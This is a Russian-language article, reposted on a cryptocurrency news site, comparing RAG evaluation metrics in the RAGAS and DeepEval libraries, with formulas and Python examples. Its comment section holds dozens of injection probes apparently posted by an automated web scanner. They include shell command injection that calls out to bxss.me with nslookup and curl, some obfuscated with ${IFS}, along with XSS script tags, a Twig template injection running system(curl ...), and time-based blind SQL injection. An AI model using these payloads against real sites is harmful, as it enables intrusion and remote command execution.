Этот сайт использует файлы cookies. Продолжая просмотр страниц сайта, вы соглашаетесь с использованием файлов cookies. Если вам нужна дополнительная информация, пожалуйста, посетите страницу Политика файлов Cookie

Прямой эфир

Русский

English

Войти / Регистрация

Cryptocurrencies: 9544 / Markets: 113007

Market Cap: $ 3 691 605 128 269 / 24h Vol: $ 296 812 996 119 / BTC Dominance: 59.836090041736%

Н Новости

Тестирование качества работы RAG. Описание и сравнение метрик

В современном мире часто встречаются задачи с большим объемом данных, выполнение которых либо невозможно, либо сложно или затратно по времени/ресурсам автоматизировать обычными функциями и методами.

Одним из способов решения для таких случаев является применение AI с использованием RAG.

В этой статье мы постарались привести метрики для оценки качества работы подобных решений.

RAG (Retrieval Augmented Generation) - генерация ответов с использованием внешнего источника данных.

Говоря простым языком, это метод, при котором AI для выдачи ответа на поставленный вопрос использует не только общую базу знаний, на которых был обучен, но и специализированные материалы, которых, как правило, нет в свободном доступе.

В качестве примера допустим, что у вас в компании есть большое количество сотрудников и множество договоров с ними и с контрагентами. В какой-то момент вам понадобилось проверить, во всех ли договорах его положения согласуются с внутренней документацией или же недавними изменениями в законодательстве. Всегда есть риск того, что какой-то из договоров был составлен без соответствующего упоминания таких документов.

Какие есть способы решения поставленной задачи существуют?

Проверить всю документацию вручную;
Автоматизировать процесс проверки.

В первом случае есть очевидные минусы:

большие затраты времени и ресурсов;
человеческий фактор, когда на больших объемах данных ошибки в проверке становятся практически неизбежны.

Поэтому куда предпочтительнее выглядит вариант с автоматизацией.

Как автоматизировать процесс?

Можно пробовать поиск по ключевым фразам по всем документам.
Плюсы:
- Технически возможно осуществить без использования AI;
Минусы:
- Требует максимально полного описания всех возможных вариаций нужных для поиска фраз.
- Как следствие первого минуса, весьма вероятны неполное покрытие документации таким поиском, а также ложноположительные или ложноотрицательные результаты.
Например, одно и то же положение правил внутреннего распорядка или даже просто ссылка на отдельный документ, содержащий такие правила, могут быть представлены в разных документах по-разному.
Автоматизация с помощью AI:
- обучение собственной модели для поиска нужной информации
- использование RAG

Вариант с обучением собственной модели будет нормальным решением только в том случае, если ваши данные не изменяются или изменяются/правятся редко.
В случаях, когда изменения происходят постоянно или часто, обучение новой модели становится слишком затратным по времени и ресурсам.
В таких ситуациях и будет наиболее предпочтительным использование RAG.

Для тестирования качества RAG существует множество метрик. В этой статье остановимся на двух популярных библиотеках: RAGAS и DeepEval.

В RAGAS представлены следующие метрики для оценки качества работы RAG:

Context Precision
Context Recall
Context Entities Recall
Noise Sensitivity
Response Relevancy
Faithfulness
Multimodal Faithfulness
Multimodal Relevance

В DeepEval, в свою очередь, представлены следующие метрики:

Answer Relevancy
Contextual Precision
Contextual Recall
Contextual Relevancy
Faithfulness

Как видно из представленных перечней, в обоих списках есть совпадающие по названию или очень близкие по смыслу метрики. Давайте сравним их и постараемся понять, есть ли между метриками разница, и в чем она заключается. Для метрик, у которых нет аналогов у обеих библиотек, представим описание с реализацией.

Response Relevancy/Answer Relevancy

RAGAS

$\text{Answer Relevancy} = \frac{1}{N} \sum_{i=1}^{N} \text{cosine similarity}(E_{g_i}, E_0)$ $\text{Answer Relevancy} = \frac{1}{N} \sum_{i=1}^{N} \frac{E_{g_i} \cdot E_0}{\|E_{g_i}\| \|E_0\|}$

Реализация в Python:

Сначала идет подготовка данных для дальнейшей обработки. Ниже в примере представлен пример данных со всеми возможными параметрами.
Далее идет конвертация данных в форму для обработки.
Наконец, происходит подсчет и выдача результатов метрики.

В полнном виде код выглядит так:

from datasets import Dataset
from ragas import evaluate
from ragas.metrics import ResponseRelevancy

# Подготовка данных для RAGAS
data = {
    "question": questions, # Вопрос пользователя
    "answer": answers, # Ответ модели
}

# Конвертация данных
dataset = Dataset.from_dict(data)

# Вычисление метрики
def response_relevancy(dataset):
    result = evaluate(
        dataset=dataset,
        metrics=[
            ResponseRelevancy()
        ],
    )
    return result

DeepEval

$\text{Answer Relevancy} = \frac{\text{Number of Relevant Statements}}{\text{Total number of statements}}$

Реализация в Python:

Сначала идет подготовка данных для дальнейшей обработки. Ниже в примере представлен пример данных со всеми возможными параметрами.
Далее идет конвертация данных в форму для обработки.
Наконец, происходит подсчет и выдача результатов метрики.

# Импорт библиотек
import pytest
from deepeval.test_case import LLMTestCase
from deepeval import assert_test
from deepeval.metrics import AnswerRelevancyMetric
from deepeval.dataset import EvaluationDataset
from deepeval.test_case import LLMTestCase

# Подготовка формы для обработки данных
dataset = EvaluationDataset()

# Данные для тестирования
question = question # Вопрос пользователя
answers = answer # Ответ модели

# Формирование тест кейса
test_case = LLMTestCase(input=question, actual_output=answers)

# Добавление тест кейса в набор данных
dataset.add_test_case(test_case)

# Формирование метрики для оценки 
metric = AnswerRelevancyMetric(
    threshold=threshold, # Пороговое значение
    model=model, # Модель для оценки по метрике
    include_reason=True) # Формирование причины присвоения того или иного значения

@pytest.mark.asyncio
# Передача параметров для теста
@pytest.mark.parametrize(
    "test_case",
    dataset.test_cases,
)
# Вычисление результата
async def test_answer_relevancy(test_case: LLMTestCase):
    assert_test(test_case, [metric])

Метрика

Response Relevancy

Answer Relevancy

Описание

На основании ответа от модели формирует вопрос, на который такой ответ мог быть дан. Для получения более стабильных результатов генерируется несколько вариантов вопросов для сравнения с изначальным (по умолчанию, 3)

Сравнивает полученный от модели ответ с изначальным запросом от пользователя на предмет соответствия

Реализация

Промт для оценки релевантности содержит следующие инструкции:

1. Сформировать вопрос на основе ответа модели.

2. Оценить ответ на предмет уклончивости (если ответ вида “я не знаю”, “я не уверен” и т.д., то такой ответ уклончивый)

Присвоить ответу 1, если ответ уклончивый и 0, если ответ четко сформулирован.

Промт для оценки релевантности содержит следующие инструкции:

Сформировать утверждения из ответа.

Сравнить все утверждения с изначальным вопросом на предмет соответствия

Присвоить утверждению статус ‘yes’, ‘no’ или ‘idk’, в зависимости от релевантности утверждения вопросу.

Сформировать краткое пояснение о причинах получения того или иного значения метрики

Посчитать конечный результат

Таким образом, главные различия метрик состоят в:

Предметах сравнения. У метрики от RAGAS сравниваются изначальный вопрос со сгенерированными вопросами.
У метрики от deepeval сравниваются изначальный вопрос и утверждения из полученного ответа модели.
Методиках сравнения.
У метрики от RAGAS сравнение происходит посредством вычисления косинусного сходства.
У метрики от deepeval сравнение происходит посредством использования LLM.
Объяснение вердикта по сравнениям.
В метрике от RAGAS объяснения не предусмотрены, поскольку сравнение происходит посредством вычисления косинусного сходства.
В метрике от deepeval присутствуют вердикты по каждому утверждению
Обработка уклончивости и галлюцинаций в ответах:
В метрике от RAGAS уклончивость и галлюцинации в ответе могут привести к автоматическому обнулению результата расчета.
В метрике от deepeval наличие галлюцинаций и уклончивости фиксируется и приводит к снижению итогового результата оценки.

Context Precision/Contextual Precision

RAGAS

$\text{Context Precision@K} = \frac{\sum_{k=1}^{K} \text{Precision@k} \cdot r_k}{\small\text{Total number of relevant items in the top K results}}$ $\text{Precision@k} = \frac{\text{true positives@k}}{\text{true positives@k} + \text{false positives@k}}$

Реализация в Python:

Сначала идет подготовка данных для дальнейшей обработки. Ниже в примере представлен пример данных со всеми возможными параметрами.
Происходит подсчет и выдача результатов метрики.

Код для метрики с использованием LLM и без использования переданного контекста.

import asyncio
from ragas import SingleTurnSample
from ragas.metrics import LLMContextPrecisionWithoutReference

# Определение метрики с уточнением LLM для вычисления результата
context_precision = LLMContextPrecisionWithoutReference(llm=evaluator_llm)

# Подготовка данных для RAGAS
sample = SingleTurnSample(
            user_input = question # Вопрос пользователя
            retrieved_contexts = contexts # Возвращаемый контекст
            response = answer # Ответ модели  
            )

# Вычисление метрики
async def context_precision_without_reference(sample):

        result = await context_precision.single_turn_ascore(sample)
        return result


asyncio.run(run_context_precision_without_reference(sample))

Код для метрики с использованием LLM и переданным контекстом

import asyncio
from ragas import SingleTurnSample
from ragas.metrics import LLMContextPrecisionWithReference

# Определение метрики с уточнением LLM для вычисления результата
context_precision = LLMContextPrecisionWithReference(llm=evaluator_llm)

# Подготовка данных для RAGAS
sample = SingleTurnSample(
            user_input = question # Вопрос пользователя
            retrieved_contexts = contexts # Возвращаемый контекст
            reference = reference # Переданный контекст  
            )

# Вычисление метрики
async def context_precision_with_reference(sample):

        result = await context_precision.single_turn_ascore(sample)
        return result


asyncio.run(run_context_precision_with_reference(sample))

Код для метрики без использования LLM

import asyncio
from ragas import SingleTurnSample
from ragas.metrics import NonLLMContextPrecisionWithReference

# Определение метрики
context_precision = NonLLMContextPrecisionWithReference()

# Подготовка данных для RAGAS
sample = SingleTurnSample(
            retrieved_contexts = contexts # Возвращаемый контекст
            reference_contexts = reference # Переданный контекст  
            )

# Вычисление метрики
async def context_precision_without_LLM(sample):

        result = await context_precision.single_turn_ascore(sample)
        return result


asyncio.run(context_precision_without_LLM(sample))

DeepEval

$\text{Contextual Precision} = \frac{1}{\text{Number of Relevant Nodes}} \sum_{k=1}^{n} \frac{\text{Number of Relevant Nodes Up to Position k}}{k} \cdot r_k$

Реализация в Python:

Сначала идет подготовка данных для дальнейшей обработки. Ниже в примере представлен пример данных со всеми возможными параметрами.
Далее идет конвертация данных в форму для обработки.
Наконец, происходит подсчет и выдача результатов метрики.

# Импорт библиотек
import pytest
from deepeval.test_case import LLMTestCase
from deepeval import assert_test
from deepeval.metrics import ContextualPrecisionMetric
from deepeval.dataset import EvaluationDataset
from deepeval.test_case import LLMTestCase

# Подготовка формы для обработки данных
dataset = EvaluationDataset()

# Данные для тестирования
question = question # Вопрос пользователя
ground_truths = expected_answer # Ожидаемый ответ
contexts = contexts # Возвращаемый контекст

# Формирование тест кейса
test_case = LLMTestCase(input=question, expected_output=ground_truths,
                        retrieval_context=contexts)

# Добавление тест кейса в набор данных
dataset.add_test_case(test_case)

# Формирование метрики для оценки 
metric = ContextualPrecisionMetric(
    threshold=threshold, # Пороговое значение
    model=model, # Модель для оценки по метрике
    include_reason=True) # Формирование причины присвоения того или иного значения

@pytest.mark.asyncio
# Передача параметров для теста
@pytest.mark.parametrize(
    "test_case",
    dataset.test_cases,
)
# Вычисление результата
async def test_contextual_precision(test_case: LLMTestCase):
    assert_test(test_case, [metric])

Метрика	Context Precision	Contextual Precision
Описание	Сравнивает возвращенный контекст с изначальным вопросом и проверяет, каков процент релевантного контекста во всех возвращенных с помощью RAG контекстах.	Сравнивает возвращенный контекст с изначальным вопросом и проверяет, насколько высоко в выдаче оказались релевантные вопросу контексты. Подсчитывается итоговым положением релевантных контекстов в выдаче
Модификации	с использованием LLM без использования LLM	с использованием LLM
Реализация	*1. Основная реализация с LLM* Промт для оценки содержит следующие инструкции: Получить вопрос, ответ и возвращенный контекст. Определить, был ли контекст полезен для формирования ответа на поставленный вопрос. Присвоить значение 1, если полезен, и 0, если нет. *2. Модификация с эталонным контекстом* Приводится вопрос, эталонный контекст, возвращенный контекст. Сравниваются эталонный и возвращенный контекст на предмет сходства. Определяется полезность каждого возвращенного контекста. Определяется, насколько высоко полезный контекст приведен в выдаче *3. Модификация без использования LLM* Приводятся эталонный и возвращенный контексты. Происходит сравнение с помощью метрик (по умолчанию расстояние Левенштейна). Полученный результат по сходству сравнивается с пороговым значением. Если результат выше порогового значения, такой контекст признается полезным.	Промт для оценки релевантности содержит следующие инструкции: Сформировать список возвращенных из контекста элементов. Сравнить все элементы с ожидаемым ответом Присвоить элементу статус ‘yes’ или 'no' в зависимости от релевантности утверждения вопросу. Сформировать краткое пояснение о причинах получения того или иного значения метрики Посчитать конечный результат

Таким образом, главные различия метрик состоят в:

В количестве возможных модификаций. Три варианта метрики у RAGAS и одна у DeeepEval.
Различии методик сравнения у разных модификаций. Если в основной реализации у RAGAS схожая методика с DeepEval, то другие модификации уже используют эталонный контекст, а также расстояние Левенштейна (есть и другие опции сравнения) для варианта без использования LLM.
Объяснение вердикта по сравнениям.
В метрике от RAGAS объяснения не предусмотрены, поскольку сравнение происходит посредством вычисления расстояния Левенштейна (есть и другие опции сравнения) для варианта без использования LLM. При использовании LLM в RAGAS также предусмотрено объяснение вердикта.
В метрике от deepeval присутствуют вердикты по каждому утверждению.

Context Recall/Contextual Recall

RAGAS

LLM-Based Context Recall

$\small\text{Context Recall} = \frac{\scriptsize\text{Number of claims in the reference supported by the retrieved context}}{\small\text{Total number of claims in the reference}}$

Реализация в Python:

Сначала идет подготовка данных для дальнейшей обработки. Ниже в примере представлен пример данных со всеми возможными параметрами.
Происходит подсчет и выдача результатов метрики.

import asyncio
from ragas import SingleTurnSample
from ragas.metrics import LLMContextRecall

# Определение метрики с уточнением LLM для вычисления результата
context_precision = LLMContextRecall(llm=evaluator_llm)

# Подготовка данных для RAGAS
sample = SingleTurnSample(
            user_input = question # Вопрос пользователя
            retrieved_contexts = contexts # Возвращаемый контекст
            reference = reference # Переданный контекст  
            )

# Вычисление метрики
async def context_recall_with_LLM(sample):
        result = await context_recall.single_turn_ascore(sample)
        return result


asyncio.run(context_recall_with_LLM(sample))

Non LLM Based Context Recall

$\text{Context Recall} = \frac{\text{Number of relevant contexts retrieved}}{\text{Total number of reference contexts}}$

Реализация в Python:

Сначала идет подготовка данных для дальнейшей обработки. Ниже в примере представлен пример данных со всеми возможными параметрами.
Происходит подсчет и выдача результатов метрики.

import asyncio
from ragas import SingleTurnSample
from ragas.metrics import NonLLMContextRecall

# Определение метрики
context_recall = NonLLMContextRecall()

# Подготовка данных для RAGAS
sample = SingleTurnSample(
            retrieved_contexts = contexts # Возвращаемый контекст
            reference_contexts = reference # Переданный контекст  
            )

# Вычисление метрики
async def context_recall_without_LLM(sample):

        result = await context_recall.single_turn_ascore(sample)
        return result


asyncio.run(context_recall_without_LLM(sample))

DeepEval

$\scriptsize\text{Contextual Recall} = \frac{1}{\scriptsize\text{Number of Relevant Nodes}} \sum_{k=1}^{n} \frac{\scriptsize\text{Number of Relevant Nodes Up to Position k}}{k} \cdot r_k$

Реализация в Python:

Сначала идет подготовка данных для дальнейшей обработки. Ниже в примере представлен пример данных со всеми возможными параметрами.
Далее идет конвертация данных в форму для обработки.
Наконец, происходит подсчет и выдача результатов метрики.

# Импорт библиотек
import pytest
from deepeval.test_case import LLMTestCase
from deepeval import assert_test
from deepeval.metrics import ContextualRecallMetric
from deepeval.dataset import EvaluationDataset
from deepeval.test_case import LLMTestCase

# Подготовка формы для обработки данных
dataset = EvaluationDataset()

# Данные для тестирования
question = question # Вопрос пользователя
ground_truths = expected_answer # Ожидаемый ответ
contexts = contexts # Возвращаемый контекст

# Формирование тест кейса
test_case = LLMTestCase(input=question, expected_output=ground_truths,
                        retrieval_context=contexts)

# Добавление тест кейса в набор данных
dataset.add_test_case(test_case)

# Формирование метрики для оценки 
metric = ContextualRecallMetric(
    threshold=threshold, # Пороговое значение
    model=model, # Модель для оценки по метрике
    include_reason=True) # Формирование причины присвоения того или иного значения

@pytest.mark.asyncio
# Передача параметров для теста
@pytest.mark.parametrize(
    "test_case",
    dataset.test_cases,
)
# Вычисление результата
async def test_contextual_recall(test_case: LLMTestCase):
    assert_test(test_case, [metric])

Метрика	Context Recall	Contextual Recall
Описание	Показывает, сколько релевантных документов было приведено на заданный вопрос	Вычисляет, представлены ли ключевые элементы, релевантные вопросу пользователя, в приведенном контексте выше нерелевантных
Модификации	с использованием LLM сравнивает количество утверждений из переданного контекста и возвращенного контекста относительно общего количества утверждений в ответе без использования LLM сравнивает количество релевантных контекстов относительно общего числа приведенных контекстов	с использованием LLM
Реализация	*1. Основная реализация с LLM* Промт для оценки содержит следующие инструкции: Получить ответ и возвращенный контекст. Определить по каждому предложению из ответа, относится ли оно к приведенному контексту Вывести итоговое значение метрики *2. Модификация с эталонным контекстом* Приводится эталонный контекст, возвращенный контекст. Сравниваются эталонный и возвращенный контекст на предмет сходства Определяется релевантность каждого возвращенного контекста эталонному Определяется отношение количества релевантного контекста к общему количеству контента 3. *Модификация без использования LLM* Приводятся эталонный и возвращенный контексты. Происходит сравнение с помощью метрик (по умолчанию расстояние Левенштейна). Полученный результат по сходству сравнивается с пороговым значением. Если результат выше порогового значения, такой контекст признается полезным.	Промт для оценки релевантности содержит следующие инструкции: Составить список выданных в ответе модели утверждений на предмет релевантных и нерелевантных приведенному контексту Сформировать краткое пояснение о причинах получения того или иного значения метрики Посчитать конечный результат

Таким образом, главные различия метрик состоят в:

В количестве возможных модификаций. Три варианта метрики у RAGAS и одна у DeeepEval.
Различии методик сравнения у разных модификаций. Если в основной реализации у RAGAS схожая методика с DeepEval, то другие модификации уже используют эталонный контекст, а также расстояние Левенштейна (есть и другие опции сравнения) для варианта без использования LLM.
Объяснение вердикта по сравнениям.
В метрике от RAGAS объяснения не предусмотрены, поскольку сравнение происходит посредством вычисления расстояния Левенштейна (есть и другие опции сравнения) для варианта без использования LLM. При использовании LLM в RAGAS также предусмотрено объяснение вердикта.
В метрике от deepeval присутствуют вердикты по каждому утверждению.

Faithfulness/Faithfulness

RAGAS

$\small\text{Faithfulness} = \frac{\small\text{Number of claims in the response supported by the retrieved context}}{\text{Total number of claims in the response}}$

Реализация в Python:

Сначала идет подготовка данных для дальнейшей обработки. Ниже в примере представлен пример данных со всеми возможными параметрами.
Далее идет конвертация данных в форму для обработки.
Наконец, происходит подсчет и выдача результатов метрики.

from datasets import Dataset
from ragas import evaluate
from ragas.metrics import faithfulness

# Подготовка данных для RAGAS
data = {
    "question": questions, # Вопрос пользователя
    "contexts": contexts, # Возвращаемый контекст
    "reference": references # Переданный контекст
}

# Конвертация данных
dataset = Dataset.from_dict(data)

# Вычисление метрики
def check_faithfulness(dataset):
    result = evaluate(
        dataset=dataset,
        metrics=[
            faithfulness
        ],
    )
    return result

DeepEval

$\text{Faithfulness} = \frac{\text{Number of Truthful Claims}}{\text{Total Number of Claims}}$

Реализация в Python:

Сначала идет подготовка данных для дальнейшей обработки. Ниже в примере представлен пример данных со всеми возможными параметрами.
Далее идет конвертация данных в форму для обработки.
Наконец, происходит подсчет и выдача результатов метрики.

# Импорт библиотек
import pytest
from deepeval.test_case import LLMTestCase
from deepeval import assert_test
from deepeval.metrics import FaithfulnessMetric
from deepeval.dataset import EvaluationDataset
from deepeval.test_case import LLMTestCase

# Подготовка формы для обработки данных
dataset = EvaluationDataset()

# Данные для тестирования
question = question # Вопрос пользователя
contexts = contexts # Возвращаемый контекст
answers = answer # Ответ модели

# Формирование тест кейса
test_case = LLMTestCase(input=question, actual_output=answers,  
                        retrieval_context=contexts)

# Добавление тест кейса в набор данных
dataset.add_test_case(test_case)

# Формирование метрики для оценки 
metric = FaithfulnessMetric(
    threshold=threshold, # Пороговое значение
    model=model, # Модель для оценки по метрике
    include_reason=True) # Формирование причины присвоения того или иного значения

@pytest.mark.asyncio
# Передача параметров для теста
@pytest.mark.parametrize(
    "test_case",
    dataset.test_cases,
)
# Вычисление результата
async def test_faithfulness(test_case: LLMTestCase):
    assert_test(test_case, [metric])

Метрика	Faithfulness (RAGAS)	Faithfulness (DeepEval)
Описание	Показывает количество утверждений в ответе модели, которые соответствуют приведенному контексту	Показывает, соответствует ли ответ модели приведенному контексту
Модификации	с использованием LLM	с использованием LLM
Реализация	Промт для оценки содержит следующие инструкции: Получить ответ, возвращенный контекст и вопрос. Разбить ответ и вопрос на отдельные утверждения Определить, относится ли каждое утверждение из ответа приведенному контексту. Если относится, то присвоить результат 1, если нет, то 0 Вычислить итоговый результат	Промт для оценки релевантности содержит следующие инструкции: Разбить ответ модели на утверждения Вычислить, относится ли каждое из утверждений к приведенному контексту. Если относится, то присвоить значение 'yes', если не относится, то присвоить значение 'no', если невозможно дать ни положительного, ни отрицательного ответа, присвоить значение 'idk' Посчитать конечный результат

Таким образом, главные различия метрик состоят в:

В количестве опций для оценки утверждений. У RAGAS только два возможных значения, в то время как у DeeepEval таких значений три.
Объяснение вердикта по сравнениям.
В метрике от RAGAS объяснения не предусмотрены, поскольку сравнение происходит посредством вычисления расстояния Левенштейна (есть и другие опции сравнения) для варианта без использования LLM. При использовании LLM в RAGAS также предусмотрено объяснение вердикта.
В метрике от deepeval присутствуют вердикты по каждому утверждению.

Context Entities Recall

Метрика показывает, какой процент сущностей из переданного контекста присутствует в возвращенном контексте. Рассчитывается как отношение количества сущностей в приведенном контексте к общему числу сущностей в переданном контексте.

$\text{Context Entity Recall} = \frac{\text{Number of common entities between RE and RCE}}{\text{Total number of entities in RE}}$

где

RE - набор сущностей в переданном контексте
RCE - набор сущностей в возвращенном контексте

Реализация

1. Происходит разбивка текста на независимые неповторяющиеся сущности.
2. Сравниваются множества сущностей в переданном и возвращенном контекстах
3. Вычисляется итоговое значение метрики.

from datasets import Dataset
from ragas import evaluate
from ragas.metrics import ContextEntityRecall

# Подготовка данных для RAGAS
data = {
    "contexts": contexts, # Возвращаемый контекст
    "reference": references # Переданный контекст
}

# Конвертация данных
dataset = Dataset.from_dict(data)

# Вычисление метрики
def check_context_entity_recall(dataset):
    result = evaluate(
        dataset=dataset,
        metrics=[
            ContextEntityRecall()
        ],
    )
    return result

Noise Sensitivity

Метрика показывает процент нерелевантных утверждений относительно общего количества утверждений в ответе.

$\text{Noise Sensitivity} = \frac{|\text{Total number of incorrect claims in the response}|}{|\text{Total number of claims in the response}|}$

Реализация

Происходит разбивка ответа на утверждения
Каждое утверждение оценивается на предмет релевантности вопросу.
Вычисляется итоговое значение метрики.

from datasets import Dataset
from ragas import evaluate
from ragas.metrics import NoiseSensitivity

# Подготовка данных для RAGAS
data = {
    "question": questions, # Вопрос пользователя
    "answer": answers, # Ответ модели
    "contexts": contexts, # Возвращаемый контекст
    "reference": references # Переданный контекст
}

# Конвертация данных
dataset = Dataset.from_dict(data)

# Вычисление метрики
def check_noise_sensitivity(dataset):
    result = evaluate(
        dataset=dataset,
        metrics=[
            NoiseSensitivity()
        ],
    )
    return result

Multimodal Faithfulness

Метрика показывает фактическое соответствие ответа модели и возвращенного контекста.
Ответ считается правдивым, если все его утверждения могут быть получены из возвращенного контекста (текста или картинок).

Реализация

Ответ модели сравнивается с возвращенным контекстом (текстом и картинками) на предмет фактического соответствия.
Если ответ фактически соответствует контексту, ему присваивается значение 1, в противном случае 0.
Происходит подсчет итогового результата.

import asyncio
from ragas.dataset_schema import SingleTurnSample
from ragas.metrics import MultiModalFaithfulness
from datasets import Dataset
from ragas import evaluate

# Подготовка данных для RAGAS
data = {
        "user_input": question, # Вопрос пользователя
        "response": answer, # Ответ модели
        "retrieved_contexts": contexts # Возвращенный контекст 
                                       # (текст или картинки)
    }

# Конвертация данных
dataset = Dataset.from_dict(data)

# Вычисление метрики
def check_multimodal_faithfulness(dataset):
    result = evaluate(
        dataset=dataset,
        metrics=[
            MultiModalFaithfulness()
        ],
    )
    return result

Multimodal Relevancy

Метрика показывает, насколько ответ модели соответствует возвращенному контексту.

Реализация

Ответ модели сравнивается с возвращенным контекстом (текстом и картинками) на предмет соответствия.
Если ответ соответствует контексту, ему присваивается значение 1, в противном случае 0.
Происходит подсчет итогового результата.

import asyncio
from ragas.dataset_schema import SingleTurnSample
from ragas.metrics import MultiModalRelevance
from datasets import Dataset
from ragas import evaluate

# Подготовка данных для RAGAS
data = {
        "user_input": question, # Вопрос пользователя
        "response": answer, # Ответ модели
        "retrieved_contexts": contexts # Возвращенный контекст 
                                       # (текст или картинки)
    }

# Конвертация данных
dataset = Dataset.from_dict(data)

# Вычисление метрики
def check_multimodal_relevancy(dataset):
    result = evaluate(
        dataset=dataset,
        metrics=[
            MultiModalRelevance()
        ],
    )
    return result

Contextual Relevancy

Метрика показывает, насколько контекст релевантен изначальному запросу.

Реализация

Происходит разбиение контекста на утверждения.
Каждое утверждение оценивается на предмет релевантности вопросу. Если утверждение релевантно, ему присваивается значение 'yes', в противном случае присваивается значение 'no'
Происходит итоговый подсчет метрики.

# Импорт библиотек
import pytest
from deepeval.test_case import LLMTestCase
from deepeval import assert_test
from deepeval.metrics import ContextualRelevancyMetric
from deepeval.dataset import EvaluationDataset
from deepeval.test_case import LLMTestCase

# Подготовка формы для обработки данных
dataset = EvaluationDataset()

# Данные для тестирования
question = question # Вопрос пользователя
contexts = contexts # Возвращаемый контекст

# Формирование тест кейса
test_case = LLMTestCase(input=question, retrieval_context=contexts)

# Добавление тест кейса в набор данных
dataset.add_test_case(test_case)

# Формирование метрики для оценки 
metric = ContextualRelevancyMetric(
    threshold=threshold, # Пороговое значение
    model=model, # Модель для оценки по метрике
    include_reason=True) # Формирование причины присвоения того или иного значения

@pytest.mark.asyncio
# Передача параметров для теста
@pytest.mark.parametrize(
    "test_case",
    dataset.test_cases,
)
# Вычисление результата
async def test_contextual_relevancy(test_case: LLMTestCase):
    assert_test(test_case, [metric])

Как видно из указанного выше описания, все метрики RAGAS и DeepEval, несмотря на свою схожесть, имеют свои плюсы и минусы, и, как следствие, могут быть эффективно использованы в подходящей для этого ситуации.

Поскольку область применения AI становится все шире, требуется и большое разнообразие метрик для оценки качества работы AI-продуктов.

В этой статье мы рассмотрели лишь часть применяемых метрик, касающихся работы с RAG. В следующих публикациях постараемся рассказать о других имеющихся на данный момент метриках и принципах их работы.

Источник

Теги

Категория

Новости

Дата

8 окт. 2025 г.

09.10.25 08:08 pHqghUme

expr 9000227416 - 917575
09.10.25 08:08 pHqghUme

(nslookup -q=cname hitrirljyvgim44c57.bxss.me||curl hitrirljyvgim44c57.bxss.me))
09.10.25 08:08 pHqghUme

$(nslookup -q=cname hitnaasjhmbqf44699.bxss.me||curl hitnaasjhmbqf44699.bxss.me)
09.10.25 08:08 pHqghUme

&nslookup -q=cname hitdjgcbtalqm528b9.bxss.me&'\"`0&nslookup -q=cname hitdjgcbtalqm528b9.bxss.me&`'
09.10.25 08:08 pHqghUme

&(nslookup -q=cname hitgrfzhgegxdb7bdf.bxss.me||curl hitgrfzhgegxdb7bdf.bxss.me)&'\"`0&(nslookup -q=cname hitgrfzhgegxdb7bdf.bxss.me||curl hitgrfzhgegxdb7bdf.bxss.me)&`'
09.10.25 08:08 pHqghUme

|(nslookup -q=cname hitfmymffseet6e8b2.bxss.me||curl hitfmymffseet6e8b2.bxss.me)
09.10.25 08:08 pHqghUme

`(nslookup -q=cname hitohduurqhba06a59.bxss.me||curl hitohduurqhba06a59.bxss.me)`
09.10.25 08:08 pHqghUme

;(nslookup -q=cname hitieevbtlzep92252.bxss.me||curl hitieevbtlzep92252.bxss.me)|(nslookup -q=cname hitieevbtlzep92252.bxss.me||curl hitieevbtlzep92252.bxss.me)&(nslookup -q=cname hitieevbtlzep92252.bxss.me||curl hitieevbtlzep92252.bxss.me)
09.10.25 08:08 pHqghUme

is it ok if I upload an image?
09.10.25 08:08 pHqghUme

|(nslookup${IFS}-q${IFS}cname${IFS}hitanwkhusxwr37069.bxss.me||curl${IFS}hitanwkhusxwr37069.bxss.me)
09.10.25 08:09 pHqghUme

&(nslookup${IFS}-q${IFS}cname${IFS}hitochckpfbtw00d29.bxss.me||curl${IFS}hitochckpfbtw00d29.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitochckpfbtw00d29.bxss.me||curl${IFS}hitochckpfbtw00d29.bxss.me)&`'
09.10.25 08:09 pHqghUme

can I ask you a question please?
09.10.25 08:09 pHqghUme

is it ok if I upload an image?
09.10.25 08:09 pHqghUme

is it ok if I upload an image?
09.10.25 08:09 pHqghUme

e
09.10.25 08:11 pHqghUme

e
09.10.25 08:11 pHqghUme

e
09.10.25 08:11 pHqghUme

e
09.10.25 08:11 pHqghUme

can I ask you a question please?
09.10.25 08:12 pHqghUme

can I ask you a question please?
09.10.25 08:12 pHqghUme

can I ask you a question please?
09.10.25 08:12 pHqghUme

is it ok if I upload an image?
09.10.25 08:13 pHqghUme

can I ask you a question please?'"()&%<zzz><ScRiPt >6BEP(9887)</ScRiPt>
09.10.25 08:13 pHqghUme

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityjalvnplljd6041.bxss.me")}}
09.10.25 08:13 pHqghUme

'"()&%<zzz><ScRiPt >6BEP(9632)</ScRiPt>
09.10.25 08:13 pHqghUme

can I ask you a question please?9425407
09.10.25 08:13 pHqghUme

is it ok if I upload an image?
09.10.25 08:14 pHqghUme

is it ok if I upload an image?
09.10.25 08:16 pHqghUme

e
09.10.25 08:17 pHqghUme

e
09.10.25 08:17 pHqghUme

e
09.10.25 08:17 pHqghUme

"+response.write(9043995*9352716)+"
09.10.25 08:17 pHqghUme

can I ask you a question please?
09.10.25 08:17 pHqghUme

can I ask you a question please?
09.10.25 08:17 pHqghUme

can I ask you a question please?
09.10.25 08:18 pHqghUme

can I ask you a question please?
09.10.25 08:18 pHqghUme

$(nslookup -q=cname hitconyljxgbe60e2b.bxss.me||curl hitconyljxgbe60e2b.bxss.me)
09.10.25 08:18 pHqghUme

is it ok if I upload an image?
09.10.25 08:18 pHqghUme

is it ok if I upload an image?
09.10.25 08:18 pHqghUme

|(nslookup -q=cname hitrwbjjcbfsjdad83.bxss.me||curl hitrwbjjcbfsjdad83.bxss.me)
09.10.25 08:18 pHqghUme

|(nslookup${IFS}-q${IFS}cname${IFS}hitmawkdrqdgobcdfd.bxss.me||curl${IFS}hitmawkdrqdgobcdfd.bxss.me)
09.10.25 08:18 pHqghUme

is it ok if I upload an image?
09.10.25 08:19 pHqghUme

is it ok if I upload an image?
09.10.25 08:20 pHqghUme

e
09.10.25 08:20 pHqghUme

e
09.10.25 08:21 pHqghUme

e
09.10.25 08:21 pHqghUme

e
09.10.25 08:21 pHqghUme

can I ask you a question please?
09.10.25 08:22 pHqghUme

can I ask you a question please?
09.10.25 08:22 pHqghUme

can I ask you a question please?
09.10.25 08:22 pHqghUme

is it ok if I upload an image?
09.10.25 08:22 pHqghUme

if(now()=sysdate(),sleep(15),0)
09.10.25 08:22 pHqghUme

can I ask you a question please?0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
09.10.25 08:23 pHqghUme

